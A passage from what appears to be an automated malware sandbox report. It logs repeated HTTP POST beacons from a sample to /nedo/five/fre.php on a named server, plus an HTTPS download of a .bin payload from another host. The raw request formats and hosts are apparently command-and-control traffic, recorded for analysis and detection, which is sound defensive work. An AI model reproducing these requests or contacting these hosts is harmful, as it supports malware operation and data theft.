                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:55.828042030 CET385INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:55 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                55192.168.11.2049842192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:56.348588943 CET386OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:56.651110888 CET386INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:56 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                56192.168.11.2049843192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:57.167977095 CET387OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:57.496169090 CET387INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:57 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                57192.168.11.2049844192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:58.023260117 CET388OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:58.339368105 CET389INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:58 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                58192.168.11.2049845192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:58.864840984 CET389OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:59.178734064 CET390INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:58 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                59192.168.11.2049846192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:59.689049006 CET391OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:59.975543022 CET391INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:59 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                6192.168.11.2049793192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:11.736716986 CET323OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:12.041415930 CET324INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:11 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                60192.168.11.2049847192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:00.511900902 CET392OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:00.827406883 CET392INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:00 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                61192.168.11.2049848192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:01.346014023 CET393OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:01.728337049 CET394INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:01 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                62192.168.11.2049849192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:02.238846064 CET394OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:02.601727009 CET395INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:02 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                63192.168.11.2049850192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:03.116560936 CET396OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:03.426031113 CET396INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:03 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                64192.168.11.2049851192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:03.916595936 CET397OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:04.288131952 CET398INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:03 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                65192.168.11.2049852192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:04.808484077 CET398OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:05.104880095 CET399INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:04 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                66192.168.11.2049853192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:05.541893959 CET399OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:05.856829882 CET400INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:05 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                67192.168.11.2049854192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:06.386045933 CET401OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:06.707102060 CET401INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:06 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                68192.168.11.2049855192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:07.236643076 CET402OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:07.590959072 CET403INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:07 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                69192.168.11.2049856192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:08.022269964 CET403OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:08.373509884 CET404INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:08 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                7192.168.11.2049794192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:12.785936117 CET324OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:13.082870007 CET325INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:12 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                70192.168.11.2049857192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:08.881208897 CET404OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:09.182101011 CET405INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:08 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                71192.168.11.2049858192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:09.697526932 CET406OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:10.017735958 CET406INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:09 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                72192.168.11.2049859192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:10.553688049 CET407OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:10.889452934 CET407INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:10 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                73192.168.11.2049860192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:11.411926031 CET408OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:11.751856089 CET409INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:11 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                74192.168.11.2049861192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:12.278911114 CET409OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:12.583456993 CET410INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:12 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                75192.168.11.2049862192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:30:13.115180969 CET411OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:13.441615105 CET411INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:13 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                76192.168.11.2049863192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                77192.168.11.2049864192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                78192.168.11.2049865192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                79192.168.11.2049866192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                8192.168.11.2049795192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:13.775517941 CET326OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:14.092895031 CET326INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:13 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                80192.168.11.2049867192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                81192.168.11.2049868192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                82192.168.11.2049869192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                83192.168.11.2049870192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                84192.168.11.2049871192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                85192.168.11.2049872192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                86192.168.11.2049873192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                87192.168.11.2049874192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                88192.168.11.2049875192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                89192.168.11.2049876192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                9192.168.11.2049796192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:14.715713978 CET327OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:15.013587952 CET327INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:14 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                90192.168.11.2049877192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                91192.168.11.2049878192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                92192.168.11.2049879192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                93192.168.11.2049880192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                94192.168.11.2049881192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                95192.168.11.2049882192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                96192.168.11.2049883192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                97192.168.11.2049884192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                98192.168.11.2049885192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                99192.168.11.2049886192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.11.204978768.66.226.70443C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                2021-11-22 14:28:58 UTC0OUTGET /karinedocesesalgados_HpiSWwhaod1.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Host: afrocompass.com
                                Cache-Control: no-cache
                                2021-11-22 14:28:58 UTC0INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:28:58 GMT
                                Server: Apache
                                Strict-Transport-Security: max-age=63072000; includeSubDomains
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Last-Modified: Mon, 22 Nov 2021 06:16:05 GMT
                                Accept-Ranges: bytes
                                Content-Length: 106560
                                Connection: close
                                Content-Type: application/octet-stream
